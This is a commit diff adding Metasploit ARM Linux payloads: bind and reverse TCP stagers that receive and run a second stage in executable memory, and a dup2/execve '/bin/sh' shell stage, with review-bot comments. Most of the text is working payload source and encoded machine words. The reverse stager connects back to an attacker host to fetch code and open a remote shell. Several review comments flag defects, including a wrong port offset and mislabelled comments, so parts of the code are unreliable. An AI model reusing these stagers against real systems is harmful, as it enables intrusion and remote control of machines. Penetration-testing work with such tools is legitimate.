Land #1879, @dcbz ARM stagers
commit
07c99f821e
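--- /dev/null
+++ b/PATH-NOT-SHOWN/generic.s
@@ -0,0 +1,34 @@
+@@
+@
+@ Name: generic
+@ Qualities: -
+@ Authors: nemo <nemo [at] felinemenace.org>
+@ License: MSF_LICENSE
+@ Description:
+@
+@ dup2 / execve("/bin/sh") stage for Linux ARM LE architecture.
+@@
+
+.text
+.globl _start
+_start:
+int dup2(int oldfd, int newfd);
+mov r7,#63 ; __NR_dup2
+mov r1,#3
+up:
+mov r0,r12 ; oldfd (descriptor stored in r12 by the stager)
+sub r1,#1 ; newfd
+swi 0
+cmp r1,#1
+bge up
+@ execve(const char *path, char *const argv[], char *const envp[]);
+mov r7,#11 ; __NR_execve
+add r0,pc,#24 ; *path
+sub sp,#24
+str r0,[sp,#-20]
+mov r2,#0
+str r2,[sp,#-16]
+add r1,sp,#-20 ; *argv[]
+mov r2,r1 ; *envp[]
+swi 0
+.string "/bin/sh"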
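Review bot: `int dup2(int oldfd, int newfd);` sits between `_start:` and `mov r7,#63` as a bare line with no `@` marker, unlike the `@ execve(...)` prototype further down, so the assembler would read it as an instruction; it should be `@ int dup2(int oldfd, int newfd);`. This file also uses `;` for end-of-line comments (`mov r7,#63 ; __NR_dup2`) where the two stager files use `@`; in GNU as for 32-bit ARM `;` is a statement separator rather than a comment character, so the text after it would be parsed as a mnemonic if this file is assembled with the `as` invocation the stager headers document — switching to `@` removes the inconsistency. The execve argument array is built below the stack pointer: `sub sp,#24` lowers sp, but `str r0,[sp,#-20]` and `str r2,[sp,#-16]` then store beneath the new sp and `add r1,sp,#-20` points argv there, so the 24 reserved bytes are never referenced; a comment such as `@ argv[] = { path, NULL } built at sp-20..sp-12, below sp` would make the layout explicit, and `mov r1,#3` deserves `@ dup2 onto descriptors 2, 1, 0`.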
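--- /dev/null
+++ b/stager_sock_bind.s
@@ -0,0 +1,101 @@
+@@
+@
+@ Name: stager_sock_bind
+@ Qualities: -
+@ Authors: nemo <nemo [at] felinemenace.org>
+@ License: MSF_LICENSE
+@ Description:
+@
+@ Implementation of a Linux portbind TCP stager for ARM LE architecture.
+@
+@ Socket descriptor in r12.
+@
+@ Assemble with: as stager_sock_bind.s -o stager_sock_bind.o
+@ Link with: ld stager_sock_bind.o -o stager_sock_bind
+@
+@ Meta-Information:
+@
+@ meta-shortname=Linux Bind TCP Stager
+@ meta-description=Listen on a port for a connection and run a second stage
+@ meta-authors=nemo <nemo [at] felinemenace.org>
+@ meta-os=linux
+@ meta-arch=armle
+@ meta-category=stager
+@ meta-connection-type=bind
+@ meta-name=bind_tcp
+@@
+
+.text
+.globl _start
+_start:
+@ int socket(int domain, int type, int protocol);
+ldr r7,=281 @ __NR_socket
+mov r0,#2 @ domain = AF_INET
+mov r1,#1 @ type = SOCK_STREAM
+mov r2,#6 @ protocol = IPPROTO_TCP
+swi 0
+@ int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
+mov r12,r0 @ sockfd
+add r7,#1 @ __NR_bind
+add r1,pc,#176 @ *addr
+mov r2,#16 @ addrlen
+swi 0
+@ int listen(int sockfd, int backlog);
+add r7,#2 @ __NR_listen
+mov r0,r12 @ sockfd
+swi 0
+@ int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
+add r7,#1 @ __NR_accept
+mov r0,r12 @ sockfd
+sub r1,r1,r1 @ *addr = NULL
+mov r2,r1 @ *addrlen = NULL
+swi 0
+@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
+mov r12,r0 @ sockfd
+sub sp,#4
+add r7,#6 @ __NR_recv
+mov r1,sp @ *buf (on the stack)
+mov r2,#4 @ len
+mov r3,#0 @ flags
+swi 0
+@ round length
+ldr r1,[sp,#0]
+ldr r3,=0xfffff000
+and r1,r1,r3
+mov r2,#1
+lsl r2,#12
+@ void *mmap2(void *addr, size_t length, int prot, int flags, int fd, off_t pgoffset);
+add r1,r2 @ length
+mov r7, #192 @ __NR_mmap2
+ldr r0,=0xffffffff @ *addr = NULL
+mov r2,#7 @ prot = PROT_READ | PROT_WRITE | PROT_EXEC
+ldr r3,=0x1022 @ flags = MAP_ANON | MAP_PRIVATE
+mov r4,r0 @ fd
+mov r5,#0 @ pgoffset
+swi 0
+@ recv loop
+@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
+add r7,#99 @ __NR_recv
+mov r1,r0 @ *buf
+mov r0,r12 @ sockfd
+mov r3,#0 @ flags
+@ remove blocksize from total length
+loop:
+ldr r2,[sp,#0]
+sub r2,#1000
+str r2,[sp,#0]
+cmp r2, #0
+ble last
+mov r2,#1000 @ len
+swi 0
+b loop
+last:
+add r2,#1000 @ len
+swi 0
+@ branch to code
+mov pc,r1
+@ addr
+@ port: 4444 , sin_fam = 2
+.word 0x5c110002
+@ ip
+.word 0x00000000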
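Review bot: The comment on `ldr r0,=0xffffffff @ *addr = NULL` contradicts the value: r0 is -1 rather than NULL, and `mov r4,r0 @ fd` then reuses that same -1 as the anonymous-mapping fd, a double duty the comment hides; `@ *addr = -1 (hint only, no MAP_FIXED); reused as fd = -1 below` states what the line does. `ldr r3,=0x1022 @ flags = MAP_ANON | MAP_PRIVATE` omits the 0x1000 bit, which the Linux uapi mman header names MAP_EXECUTABLE — list it in the comment or drop it from the constant. In the `@ recv loop`, r0 holds recv's return value after the first `swi 0`, and neither r0 (sockfd) nor r1 (buffer) is re-established before `b loop` returns to `loop:`, so only the single-call path through `last:` matches the comments as written; at minimum `@ recv loop` should say so, and the identical sequence appears in stager_sock_reverse.s. The `@ round length` block computes `(len & 0xfffff000) + 0x1000`, which over-allocates a whole page when len is already page-aligned; `@ round up to the next page (adds a full page if already aligned)` would document that.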
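--- /dev/null
+++ b/stager_sock_reverse.s
@@ -0,0 +1,92 @@
+@@
+@
+@ Name: stager_sock_reverse
+@ Qualities: -
+@ Authors: nemo <nemo [at] felinemenace.org>
+@ License: MSF_LICENSE
+@ Description:
+@
+@ Implementation of a Linux reverse TCP stager for ARM LE architecture.
+@
+@ Socket descriptor in r12.
+@
+@ Assemble with: as stager_sock_reverse.s -o stager_sock_reverse.o
+@ Link with: ld stager_sock_reverse.o -o stager_sock_reverse
+@
+@ Meta-Information:
+@
+@ meta-shortname=Linux Reverse TCP Stager
+@ meta-description=Connect back to the framework and run a second stage
+@ meta-authors=nemo <nemo [at] felinemenace.org>
+@ meta-os=linux
+@ meta-arch=armle
+@ meta-category=stager
+@ meta-connection-type=reverse
+@ meta-name=reverse_tcp
+@@
+
+.text
+.globl _start
+_start:
+@ int socket(int domain, int type, int protocol);
+ldr r7,=281 @ __NR_socket
+mov r0,#2 @ domain = AF_INET
+mov r1,#1 @ type = SOCK_STREAM
+mov r2,#6 @ protocol = IPPROTO_TCP
+swi 0
+@ int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
+mov r12,r0 @ sockfd
+add r7,#2 @ __NR_socket
+add r1,pc,#144 @ *addr
+mov r2,#16 @ addrlen
+swi 0
+@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
+mov r0,r12 @ sockfd
+sub sp,#4
+add r7,#8 @ __NR_recv
+mov r1,sp @ *buf (on the stack)
+mov r2,#4 @ len
+mov r3,#0 @ flags
+swi 0
+@ round length
+ldr r1,[sp,#0]
+ldr r3,=0xfffff000
+and r1,r1,r3
+mov r2,#1
+lsl r2,#12
+@ void *mmap2(void *addr, size_t length, int prot, int flags, int fd, off_t pgoffset);
+add r1,r2 @ length
+mov r7, #192 @ __NR_mmap2
+ldr r0,=0xffffffff @ *addr = NULL
+mov r2,#7 @ prot = PROT_READ | PROT_WRITE | PROT_EXEC
+ldr r3,=0x1022 @ flags = MAP_ANON | MAP_PRIVATE
+mov r4,r0 @ fd
+mov r5,#0 @ pgoffset
+swi 0
+@ recv loop
+@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
+add r7,#99 @ __NR_recv
+mov r1,r0 @ *buf
+mov r0,r12 @ sockfd
+mov r3,#0 @ flags
+@ remove blocksize from total length
+loop:
+ldr r2,[sp,#0]
+sub r2,#1000
+str r2,[sp,#0]
+cmp r2, #0
+ble last
+mov r2,#1000 @ len
+swi 0
+b loop
+last:
+add r2,#1000 @ len
+swi 0
+@ branch to code
+mov pc,r1
+@ addr
+@ port: 4444 , sin_fam = 2
+.word 0x5c110002
+@ ip: 127.0.0.1
+.word 0x01aca8c0
+@.word 0x0100007f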
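Review bot: `add r7,#2 @ __NR_socket` mislabels the syscall number: r7 was loaded with 281 (`__NR_socket`) a few lines earlier and this yields 283, the connect call that the preceding `@ int connect(...)` prototype introduces, so the comment should read `@ __NR_connect`. The data comment `@ ip: 127.0.0.1` also disagrees with the active `.word 0x01aca8c0`, whose little-endian bytes decode to 192.168.172.1; the commented-out `@.word 0x0100007f` is the 127.0.0.1 encoding and is the value the Ruby module carries, so either re-enable that word or change the comment to match what is assembled. Since the `.word` values here are the bytes the framework patches at run time, a `@ LHOST/LPORT patched by the module at these offsets` comment above `@ addr` would tell a reader why the literals are placeholders.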
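--- /dev/null
+++ b/PATH-NOT-SHOWN/bind_tcp.rb
@@ -0,0 +1,120 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+
+
+###
+#
+# BindTcp
+# -------
+#
+# Linux bind TCP stager.
+#
+###
+module Metasploit3
+
+include Msf::Payload::Stager
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'Bind TCP Stager',
+'Description' => 'Listen for a connection',
+'Author' => 'nemo <nemo[at]felinemenace.org>',
+'License' => MSF_LICENSE,
+'Platform' => 'linux',
+'Arch' => ARCH_ARMLE,
+'Handler' => Msf::Handler::BindTcp,
+'Stager' =>
+{
+'Offsets' =>
+{
+'LPORT' => [ 226, 'n' ],
+},
+'Payload' =>
+[
+0xe59f70d4, # ldr r7, [pc, #212]
+0xe3a00002, # mov r0, #2
+0xe3a01001, # mov r1, #1
+0xe3a02006, # mov r2, #6
+0xef000000, # svc 0x00000000
+0xe1a0c000, # mov ip, r0
+0xe2877001, # add r7, r7, #1
+0xe28f10b0, # add r1, pc, #176
+0xe3a02010, # mov r2, #16
+0xef000000, # svc 0x00000000
+0xe2877002, # add r7, r7, #2
+0xe1a0000c, # mov r0, ip
+0xef000000, # svc 0x00000000
+0xe2877001, # add r7, r7, #1
+0xe1a0000c, # mov r0, ip
+0xe0411001, # sub r1, r1, r1
+0xe1a02001, # mov r2, r1
+0xef000000, # svc 0x00000000
+0xe1a0c000, # mov ip, r0
+0xe24dd004, # sub sp, sp, #4
+0xe2877006, # add r7, r7, #6
+0xe1a0100d, # mov r1, sp
+0xe3a02004, # mov r2, #4
+0xe3a03000, # mov r3, #0
+0xef000000, # svc 0x00000000
+0xe59d1000, # ldr r1, [sp]
+0xe59f3070, # ldr r3, [pc, #112]
+0xe0011003, # and r1, r1, r3
+0xe3a02001, # mov r2, #1
+0xe1a02602, # lsl r2, r2, #12
+0xe0811002, # add r1, r1, r2
+0xe3a070c0, # mov r7, #192
+0xe3e00000, # mvn r0, #0
+0xe3a02007, # mov r2, #7
+0xe59f3054, # ldr r3, [pc, #84]
+0xe1a04000, # mov r4, r0
+0xe3a05000, # mov r5, #0
+0xef000000, # svc 0x00000000
+0xe2877063, # add r7, r7, #99
+0xe1a01000, # mov r1, r0
+0xe1a0000c, # mov r0, ip
+0xe3a03000, # mov r3, #0
+0xe59d2000, # ldr r2, [sp]
+0xe2422ffa, # sub r2, r2, #1000
+0xe58d2000, # str r2, [sp]
+0xe3520000, # cmp r2, #0
+0xda000002, # ble 811c <last>
+0xe3a02ffa, # mov r2, #1000
+0xef000000, # svc 0x00000000
+0xeafffff7, # b 80fc <loop>
+0xe2822ffa, # add r2, r2, #1000
+0xef000000, # svc 0x00000000
+0xe1a0f001, # mov pc, r1
+0x5c110002, # .word 0x5c110002
+0x00000000, # .word 0x00000000
+0x00000119, # .word 0x00000119
+0xfffff000, # .word 0xfffff000
+0x00001022 # .word 0x00001022
+].pack("V*")
+
+}
+))
+end
+
+def handle_intermediate_stage(conn, payload)
+
+print_status("Transmitting stage length value...(#{payload.length} bytes)")
+
+address_format = 'v'
+
+# Transmit our intermediate stager
+conn.put( [ payload.length ].pack(address_format) )
+
+Rex::ThreadSafe.sleep(0.5)
+
+return true
+end
+
+end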
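Review bot: The `'LPORT' => [ 226, 'n' ]` offset does not line up with the payload words below it: the sockaddr word `0x5c110002` is the 54th word (byte offset 212, which is also where `add r1, pc, #176` at offset 28 resolves), so the network-order port bytes are at 214, while 226 falls inside the `0xfffff000` word that `ldr r3, [pc, #112]` loads as the rounding mask. The sibling reverse_tcp module's `[ 182, 'n' ]` / `[ 184, 'ADDR' ]` agree with its `add r1, pc, #144`, so this file appears to be the outlier and `'LPORT' => [ 214, 'n' ],` looks like the intended value — confirm against an assembled listing before changing it. `address_format = 'v'` packs the stage length as 16 bits, yet the stager reads it with `mov r2, #4` (four bytes) and the reverse module uses `'V'`; the two modules and the stager should agree on one width. In both modules the comment `# Transmit our intermediate stager` describes a length prefix rather than a stage; `# Send the stage length so the stager can size its mmap` would be accurate.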
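--- /dev/null
+++ b/PATH-NOT-SHOWN/reverse_tcp.rb
@@ -0,0 +1,113 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+
+
+###
+#
+# ReverseTcp
+# ----------
+#
+# Linux reverse TCP stager.
+#
+###
+module Metasploit3
+
+include Msf::Payload::Stager
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'Reverse TCP Stager',
+'Description' => 'Connect back to the attacker',
+'Author' => 'nemo <nemo[at]felinemenace.org>',
+'License' => MSF_LICENSE,
+'Platform' => 'linux',
+'Arch' => ARCH_ARMLE,
+'Handler' => Msf::Handler::ReverseTcp,
+'Stager' =>
+{
+'Offsets' =>
+{
+'LPORT' => [ 182, 'n' ],
+'LHOST' => [ 184, 'ADDR' ],
+},
+'Payload' =>
+[
+0xe59f70b4, # ldr r7, [pc, #180]
+0xe3a00002, # mov r0, #2
+0xe3a01001, # mov r1, #1
+0xe3a02006, # mov r2, #6
+0xef000000, # svc 0x00000000
+0xe1a0c000, # mov ip, r0
+0xe2877002, # add r7, r7, #2
+0xe28f1090, # add r1, pc, #144
+0xe3a02010, # mov r2, #16
+0xef000000, # svc 0x00000000
+0xe1a0000c, # mov r0, ip
+0xe24dd004, # sub sp, sp, #4
+0xe2877008, # add r7, r7, #8
+0xe1a0100d, # mov r1, sp
+0xe3a02004, # mov r2, #4
+0xe3a03000, # mov r3, #0
+0xef000000, # svc 0x00000000
+0xe59d1000, # ldr r1, [sp]
+0xe59f3070, # ldr r3, [pc, #112]
+0xe0011003, # and r1, r1, r3
+0xe3a02001, # mov r2, #1
+0xe1a02602, # lsl r2, r2, #12
+0xe0811002, # add r1, r1, r2
+0xe3a070c0, # mov r7, #192
+0xe3e00000, # mvn r0, #0
+0xe3a02007, # mov r2, #7
+0xe59f3054, # ldr r3, [pc, #84]
+0xe1a04000, # mov r4, r0
+0xe3a05000, # mov r5, #0
+0xef000000, # svc 0x00000000
+0xe2877063, # add r7, r7, #99
+0xe1a01000, # mov r1, r0
+0xe1a0000c, # mov r0, ip
+0xe3a03000, # mov r3, #0
+0xe59d2000, # ldr r2, [sp]
+0xe2422ffa, # sub r2, r2, #1000
+0xe58d2000, # str r2, [sp]
+0xe3520000, # cmp r2, #0
+0xda000002, # ble 80fc <last>
+0xe3a02ffa, # mov r2, #1000
+0xef000000, # svc 0x00000000
+0xeafffff7, # b 80dc <loop>
+0xe2822ffa, # add r2, r2, #1000
+0xef000000, # svc 0x00000000
+0xe1a0f001, # mov pc, r1
+0x5c110002, # .word 0x5c110002
+0x0100007f, # .word 0x0100007f
+0x00000119, # .word 0x00000119
+0xfffff000, # .word 0xfffff000
+0x00001022 # .word 0x00001022
+].pack("V*")
+
+}
+))
+end
+
+def handle_intermediate_stage(conn, payload)
+
+print_status("Transmitting stage length value...(#{payload.length} bytes)")
+
+address_format = 'V'
+
+# Transmit our intermediate stager
+conn.put( [ payload.length ].pack(address_format) )
+
+Rex::ThreadSafe.sleep(0.5)
+
+return true
+end
+
+end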
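--- /dev/null
+++ b/PATH-NOT-SHOWN
@@ -0,0 +1,52 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+include Msf::Sessions::CommandShellOptions
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'Linux dup2 Command Shell',
+'Description' => 'dup2 socket in r12, then execve',
+'Author' => 'nemo <nemo[at]felinemenace.org>',
+'License' => MSF_LICENSE,
+'Platform' => 'linux',
+'Arch' => ARCH_ARMLE,
+'Session' => Msf::Sessions::CommandShell,
+'Stage' =>
+{
+'Payload' =>
+[
+0xe3a0703f, # mov r7, #63 ; 0x3f
+0xe3a01003, # mov r1, #3
+0xe1a0000c, # mov r0, ip
+0xe2411001, # sub r1, r1, #1
+0xef000000, # svc 0x00000000
+0xe3510001, # cmp r1, #1
+0xaafffffa, # bge 805c <up>
+0xe3a0700b, # mov r7, #11
+0xe28f0018, # add r0, pc, #24
+0xe24dd018, # sub sp, sp, #24
+0xe50d0014, # str r0, [sp, #-20]
+0xe3a02000, # mov r2, #0
+0xe50d2010, # str r2, [sp, #-16]
+0xe24d1014, # sub r1, sp, #20
+0xe1a02001, # mov r2, r1
+0xef000000, # svc 0x00000000
+0x6e69622f, # .word 0x6e69622f
+0x0068732f # .word 0x0068732f
+].pack("V*")
+}
+))
+end
+
+end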